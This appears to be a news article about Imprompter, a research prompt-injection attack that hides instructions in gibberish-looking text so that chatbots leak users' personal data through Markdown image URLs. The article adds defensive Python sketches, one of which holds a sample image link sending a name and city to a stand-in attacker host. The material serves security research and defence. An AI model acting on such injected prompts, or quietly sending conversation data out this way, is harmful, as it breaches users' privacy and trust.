WIRED AI October 17, 2024 TERMINATOR

Hidden prompts can turn an AI chatbot into a data thief

Researchers from UCSD and Nanyang Technological University in Singapore describe Imprompter, an attack that hides malicious instructions inside a prompt that looks meaningless to people. In tests on LeChat and ChatGLM, the method could extract personal information from chatbot conversations and send it to an attacker-controlled domain.

The story describes a prompt-injection attack that can make chatbots quietly extract and exfiltrate personal data.

A new AI security finding shows how a prompt that appears unreadable to humans can still carry clear instructions for a large language model. The attack, called Imprompter by its researchers, is designed to make an AI chatbot identify personal information inside a conversation and send it outside the chat without warning the user.

The work comes from security researchers at the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore. Their finding focuses on a risk that grows as people share more sensitive details with chatbots, including names, places of residence and work, interests, ID numbers, payment card details, email addresses, and mailing addresses.

How Imprompter hides the real command

Imprompter begins with an ordinary instruction written in natural language. That instruction tells the model to find personal information in a user conversation and send it to an attacker. The researchers then use an algorithm to transform that instruction into a prompt that looks like a random collection of characters.

To a person, the prompt does not appear to say anything useful. To the AI system, however, the hidden meaning remains available. The result is a prompt that can be shown in plain sight while concealing its actual purpose.

Xiaohan Fu, the lead author of the research and a computer science PhD student at UCSD, described the effect directly: “The effect of this particular prompt is essentially to manipulate the LLM agent to extract personal information from the conversation and send that personal information to the attacker’s address.” Fu added, “We hide the goal of the attack in plain sight.”

The source article says the researchers believe large language models may be learning relationships between tokens that go beyond normal language. That helps explain why a sequence that looks meaningless to a human can still function as an instruction for the model.

Why the leak can happen quietly

The attack is not only about getting the AI chatbot to recognize personal data. It also has to move that data out of the conversation. According to the research described in the source article, Imprompter can instruct the model to attach personal information to a URL controlled by the attacker.

The exfiltration path uses a Markdown image command. The AI tries to retrieve an image from the attacker-controlled URL, and the personal details travel with that request. In the chat, the response renders as a 1x1 transparent pixel, so the user sees nothing.

That matters because the attack depends on several actions happening together. The prompt must make the model identify sensitive information, format it into a working URL, use Markdown syntax, and avoid making the malicious behavior obvious in the chat.
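The Markdown image path described above can be made concrete from a defender's point of view. The following is a minimal Python sketch, not code from the research: the host `attacker.example`, the sample reply, and the function name `find_image_requests` are all illustrative assumptions, and the regex covers only basic inline image syntax. It shows that anything placed in an image URL's query string is handed to whichever server hosts that URL once the image is fetched.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Matches basic inline Markdown images: ![alt](url). Illustrative only;
# it does not cover reference-style images or raw HTML <img> tags.
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\((\S+?)\)")


def find_image_requests(markdown_text):
    """Return (host, path, query parameters) for each inline image URL."""
    found = []
    for match in IMAGE_PATTERN.finditer(markdown_text):
        parts = urlsplit(match.group(1))
        found.append((parts.hostname, parts.path, parse_qs(parts.query)))
    return found


# Hypothetical model reply: the image URL carries conversation data in
# its query string (it could equally be packed into the path).
reply = (
    "Sure, here is your summary. "
    "![](https://attacker.example/p.png?name=Jane+Doe&city=Paris)"
)

for host, path, params in find_image_requests(reply):
    print(host, path, params)
```

A chat interface could run a check like this on model output before rendering it and flag any image whose host it does not recognize.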

Earlence Fernandes, an assistant professor at UCSD who worked on the research, compared the behavior to malware because it can make the system perform functions the user did not intend. He said, “Normally you could write a lot of computer code to do this in traditional malware,” and added, “But here I think the cool thing is all of that can be embodied in this relatively short gibberish prompt.”

What the researchers tested

The eight researchers tested Imprompter on two large language models: LeChat by Mistral AI and ChatGLM. In both cases, the researchers found that the method could extract personal information from test conversations. The researchers wrote that the attack had a “nearly 80 percent success rate.”

They also tested the attack by uploading a CV into chatbot conversations. In that setting, the method was able to return personal information contained in the file. The researchers noted that, in a real-world scenario, people could be socially engineered into believing an unintelligible prompt was useful, such as a prompt that could improve a CV.

The attack fits within the broader category of prompt injections. Unlike jailbreaks, which try to make an AI system ignore its built-in safety rules, prompt injections feed instructions to an LLM through outside content. The source article gives the example of a hidden prompt embedded on a website that an AI might ingest while summarizing the page.

Why AI agents raise the stakes

Prompt injections are difficult to fix, and the risk becomes more serious when large language models are used as agents. In that role, an AI system may be connected to outside tools, external databases, or workflows that let it act on behalf of a user.

That added capability is useful, but it also increases the potential impact of a hidden instruction. If the model can call external resources, retrieve images, or use tools, a prompt injection may have more ways to move data or trigger unintended actions.
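One common way to limit that impact is to review each tool call before it runs. The sketch below is a hypothetical policy, not something described in the source article: the tool names, the `ToolCall` type, and the three outcomes are assumptions chosen for illustration. The idea is that tools able to reach outside services need explicit user approval, and unknown tools are refused.

```python
from dataclasses import dataclass, field


@dataclass
class ToolCall:
    """A tool invocation requested by the model (hypothetical shape)."""
    name: str
    arguments: dict = field(default_factory=dict)


# Hypothetical tool inventory, split by whether the tool can send data
# outside the conversation.
LOCAL_TOOLS = {"calculator", "search_notes"}
NETWORK_TOOLS = {"fetch_url", "send_email"}


def review_tool_call(call, user_approved=False):
    """Return 'allow', 'ask_user', or 'deny' for a requested tool call."""
    if call.name in LOCAL_TOOLS:
        return "allow"
    if call.name in NETWORK_TOOLS:
        # Outbound tools run only after the user has confirmed the call.
        return "allow" if user_approved else "ask_user"
    # Anything not in the inventory is refused by default.
    return "deny"


print(review_tool_call(ToolCall("calculator", {"expr": "2+2"})))
print(review_tool_call(ToolCall("fetch_url", {"url": "https://attacker.example/"})))
print(review_tool_call(ToolCall("delete_files")))
```

A gate like this does not stop the injection itself. It only narrows what a successful injection can do without the user noticing.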

Dan McInerney, the lead threat researcher at security company Protect AI, said the Imprompter paper “releases an algorithm for automatically creating prompts that can be used in prompt injection to do various exploitations, like PII exfiltration, image misclassification, or malicious use of tools the LLM agent can access.” He also said the work is “more along the lines of improving automated LLM attacks than undiscovered threat surfaces in them.”

McInerney warned that the risk grows as LLM agents become more common and receive more authority. His conclusion was blunt: “Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity that requires significant and creative security testing prior to deployment.”

How the companies responded

Mistral AI told WIRED it fixed the vulnerability. The researchers confirmed that the company disabled one of its chat functionalities. A Mistral AI spokesperson said the company welcomed help from security researchers, adding, “Following this feedback, Mistral AI promptly implemented the proper remediation to fix the situation.”

The company treated the issue as one with “medium severity.” Its fix stops the Markdown renderer from calling external URLs, so external images can no longer be loaded.
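The source does not describe how Mistral AI implemented this, so the following is only a minimal Python sketch of the general idea of refusing external image loads. The allowlisted host `cdn.chat.example` and the function name `strip_external_images` are assumptions for illustration. Images from hosts outside the allowlist are replaced with their alt text before the message reaches the renderer, so the client never issues the request.

```python
import re
from urllib.parse import urlsplit

# Basic inline Markdown images: ![alt](url). Reference-style images and
# raw HTML are out of scope for this sketch.
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\((\S+?)\)")

# Hypothetical allowlist of hosts the chat UI may load images from.
ALLOWED_IMAGE_HOSTS = {"cdn.chat.example"}


def strip_external_images(markdown_text, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Replace images from non-allowlisted hosts with their alt text."""

    def replace(match):
        alt_text, url = match.group(1), match.group(2)
        try:
            host = urlsplit(url).hostname
        except ValueError:
            host = None  # malformed URL: treat as untrusted
        if host in allowed_hosts:
            return match.group(0)  # keep trusted images unchanged
        return alt_text  # drop the URL so it is never fetched

    return IMAGE_PATTERN.sub(replace, markdown_text)


message = (
    "Hi ![logo](https://cdn.chat.example/l.png) and "
    "![x](https://attacker.example/p.png?d=1)"
)
print(strip_external_images(message))
```

Note that relative URLs have no hostname and are stripped too under this policy, which is the conservative choice for a sketch.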

ChatGLM did not directly comment on the vulnerability in the source article. Its statement said, “Our model is secure, and we have always placed a high priority on model security and privacy protection.” It also said that open-sourcing the model was intended to help the open-source community inspect its capabilities, including security.

The main lesson is straightforward: the visible text of a prompt is not always the full security story. If a chatbot can understand hidden structure in apparently random characters, and if it can reach outside services through features such as Markdown image loading, personal data inside a conversation can become exposed in ways users may never see.